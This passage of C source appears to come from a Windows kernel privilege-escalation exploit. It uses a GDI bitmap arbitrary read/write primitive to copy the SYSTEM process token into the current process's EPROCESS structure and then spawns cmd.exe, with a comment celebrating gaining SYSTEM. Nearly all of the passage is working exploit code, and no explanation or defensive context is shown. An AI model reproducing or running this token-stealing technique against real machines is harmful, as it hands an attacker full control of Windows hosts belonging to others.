SetAddress(addr1);
WriteToAddress(Gh05);
// get System EPROCESS
ULONG64 SystemEPROCESS = PsInitialSystemProcess();
//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
ULONG64 CurrentEPROCESS = PsGetCurrentProcess();
//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
ULONG64 SystemToken = 0;
// read token from system process
ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8);
// write token to current process
ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
SetAddress((BYTE *)&CurProccessAddr);
WriteToAddress((BYTE *)&SystemToken);
// Done and done. We're System :)
system("cmd.exe");
break;
}
if (res == 0) {
fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError());
}
}
getchar();
//clean up
DeleteObject(bitobj);
DeleteObject(bitmap);
DeleteDC(hMemDC);
ReleaseDC(NULL, hdc);
VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE);
//free(points);
}